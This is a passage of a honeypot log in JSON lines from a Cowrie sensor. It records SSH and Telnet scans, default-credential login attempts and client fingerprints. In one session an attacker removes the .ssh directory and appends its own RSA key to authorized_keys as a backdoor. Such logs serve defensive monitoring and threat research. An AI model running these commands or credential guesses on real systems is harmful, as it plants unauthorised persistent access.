dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T16:52:39.557347Z","src_ip":"212.227.125.160","session":"f54f1ab939e7"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:52:46.002990Z","src_ip":"212.227.125.160","session":"f54f1ab939e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:53:42.261006Z","src_ip":"176.65.149.186","session":"3e11affd5177"}
{"eventid":"cowrie.session.closed","duration":180.15479588508606,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:53:42.265719Z","src_ip":"176.65.149.186","session":"3e11affd5177"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.19.37","src_port":22012,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dc09be55b44","protocol":"ssh","message":"New connection: 154.221.19.37:22012 (1.2.3.4:22) [session: 0dc09be55b44]","sensor":"my-vps","timestamp":"2025-08-26T16:54:17.158231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:54:17.159172Z","src_ip":"154.221.19.37","session":"0dc09be55b44"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T16:54:17.358405Z","src_ip":"154.221.19.37","session":"0dc09be55b44"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:54:25.160266Z","src_ip":"154.221.19.37","session":"0dc09be55b44"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":48650,"dst_ip":"1.2.3.4","dst_port":23,"session":"43aab5a6ea77","protocol":"telnet","message":"New connection: 176.65.149.186:48650 (1.2.3.4:23) [session: 43aab5a6ea77]","sensor":"my-vps","timestamp":"2025-08-26T16:55:42.373774Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:55:42.412639Z","src_ip":"176.65.149.186","session":"43aab5a6ea77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:55:42.435706Z","src_ip":"176.65.149.186","session":"43aab5a6ea77"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T16:55:42.436989Z","src_ip":"176.65.149.186","session":"43aab5a6ea77"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T16:55:42.437883Z","src_ip":"176.65.149.186","session":"43aab5a6ea77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48281,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d4ab93fe4e2","protocol":"ssh","message":"New connection: 212.227.235.229:48281 (1.2.3.4:22) [session: 3d4ab93fe4e2]","sensor":"my-vps","timestamp":"2025-08-26T16:56:39.129810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:56:39.130467Z","src_ip":"212.227.235.229","session":"3d4ab93fe4e2"}
{"eventid":"cowrie.client.kex","hassh":"7216c7c473918b4f83d1139b3c70dbf9","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9","sensor":"my-vps","timestamp":"2025-08-26T16:56:39.336868Z","src_ip":"212.227.235.229","session":"3d4ab93fe4e2"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:56:43.132875Z","src_ip":"212.227.235.229","session":"3d4ab93fe4e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47287,"dst_ip":"1.2.3.4","dst_port":23,"session":"61ef139dd4d9","protocol":"telnet","message":"New connection: 212.227.125.160:47287 (1.2.3.4:23) [session: 61ef139dd4d9]","sensor":"my-vps","timestamp":"2025-08-26T16:57:20.612879Z"}
{"eventid":"cowrie.session.closed","duration":14.022340059280396,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:57:34.635144Z","src_ip":"212.227.125.160","session":"61ef139dd4d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39381,"dst_ip":"1.2.3.4","dst_port":23,"session":"59fe12019800","protocol":"telnet","message":"New connection: 212.227.235.229:39381 (1.2.3.4:23) [session: 59fe12019800]","sensor":"my-vps","timestamp":"2025-08-26T16:57:42.216428Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62672,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef9a27ec0f5c","protocol":"ssh","message":"New connection: 217.72.205.35:62672 (1.2.3.4:22) [session: ef9a27ec0f5c]","sensor":"my-vps","timestamp":"2025-08-26T16:57:55.610188Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:57:55.611247Z","src_ip":"217.72.205.35","session":"ef9a27ec0f5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33490,"dst_ip":"1.2.3.4","dst_port":23,"session":"579c3fc562a1","protocol":"telnet","message":"New connection: 212.227.235.229:33490 (1.2.3.4:23) [session: 579c3fc562a1]","sensor":"my-vps","timestamp":"2025-08-26T16:58:08.149627Z"}
{"eventid":"cowrie.session.closed","duration":0.8668766021728516,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:58:09.016403Z","src_ip":"212.227.235.229","session":"579c3fc562a1"}
{"eventid":"cowrie.session.closed","duration":31.286964416503906,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:58:13.503323Z","src_ip":"212.227.235.229","session":"59fe12019800"}
{"eventid":"cowrie.session.connect","src_ip":"198.199.84.120","src_port":20231,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9cb38abcbd5","protocol":"ssh","message":"New connection: 198.199.84.120:20231 (1.2.3.4:22) [session: d9cb38abcbd5]","sensor":"my-vps","timestamp":"2025-08-26T16:58:15.449522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:58:15.450583Z","src_ip":"198.199.84.120","session":"d9cb38abcbd5"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:58:15.644564Z","src_ip":"198.199.84.120","session":"d9cb38abcbd5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:58:42.439896Z","src_ip":"176.65.149.186","session":"43aab5a6ea77"}
{"eventid":"cowrie.session.closed","duration":180.07129287719727,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:58:42.444991Z","src_ip":"176.65.149.186","session":"43aab5a6ea77"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":51750,"dst_ip":"1.2.3.4","dst_port":22,"session":"409e39edb687","protocol":"ssh","message":"New connection: 193.32.162.145:51750 (1.2.3.4:22) [session: 409e39edb687]","sensor":"my-vps","timestamp":"2025-08-26T16:58:49.199587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:58:49.200623Z","src_ip":"193.32.162.145","session":"409e39edb687"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T16:58:49.231265Z","src_ip":"193.32.162.145","session":"409e39edb687"}
{"eventid":"cowrie.login.failed","username":"sol","password":"shredstream","message":"login attempt [sol/shredstream] failed","sensor":"my-vps","timestamp":"2025-08-26T16:58:49.323408Z","src_ip":"193.32.162.145","session":"409e39edb687"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:58:50.356356Z","src_ip":"193.32.162.145","session":"409e39edb687"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43223,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3845ca314eb","protocol":"telnet","message":"New connection: 212.227.235.229:43223 (1.2.3.4:23) [session: e3845ca314eb]","sensor":"my-vps","timestamp":"2025-08-26T17:01:05.184884Z"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.65.11","src_port":34644,"dst_ip":"1.2.3.4","dst_port":22,"session":"6132ca73ceb4","protocol":"ssh","message":"New connection: 147.45.65.11:34644 (1.2.3.4:22) [session: 6132ca73ceb4]","sensor":"my-vps","timestamp":"2025-08-26T17:01:11.749305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T17:01:11.751545Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T17:01:11.769256Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456Aa","message":"login attempt [root/Aa123456Aa] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:01:11.880543Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:01:11.962996Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T17:01:11.963775Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T17:01:11.965241Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:01:11.984192Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:01:12.083428Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T17:01:12.084161Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T17:01:12.103632Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:01:12.104581Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.65.11","src_port":34648,"dst_ip":"1.2.3.4","dst_port":22,"session":"9562bff3be2f","protocol":"ssh","message":"New connection: 147.45.65.11:34648 (1.2.3.4:22) [session: 9562bff3be2f]","sensor":"my-vps","timestamp":"2025-08-26T17:01:12.120441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T17:01:12.121253Z","src_ip":"147.45.65.11","session":"9562bff3be2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T17:01:12.139039Z","src_ip":"147.45.65.11","session":"9562bff3be2f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T17:01:12.252774Z","src_ip":"147.45.65.11","session":"9562bff3be2f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:01:13.272490Z","src_ip":"147.45.65.11","session":"9562bff3be2f"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.65.11","src_port":34656,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e1e65e78c67","protocol":"ssh","message":"New connection: 147.45.65.11:34656 (1.2.3.4:22) [session: 2e1e65e78c67]","sensor":"my-vps","timestamp":"2025-08-26T17:01:13.289208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T17:01:13.289805Z","src_ip":"147.45.65.11","session":"2e1e65e78c67"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T17:01:13.307832Z","src_ip":"147.45.65.11","session":"2e1e65e78c67"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:01:13.421451Z","src_ip":"147.45.65.11","session":"2e1e65e78c67"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:01:13.440238Z","src_ip":"147.45.65.11","session":"6132ca73ceb4"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:01:13.441103Z","src_ip":"147.45.65.11","session":"2e1e65e78c67"}
{"eventid":"cowrie.session.closed","duration":30.484907627105713,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:01:35.669719Z","src_ip":"212.227.235.229","session":"e3845ca314eb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64914,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2f8265fa6a9","protocol":"ssh","message":"New connection: 217.72.205.35:64914 (1.2.3.4:22) [session: b2f8265fa6a9]","sensor":"my-vps","timestamp":"2025-08-26T17:04:31.548083Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:04:31.549257Z","src_ip":"217.72.205.35","session":"b2f8265fa6a9"}
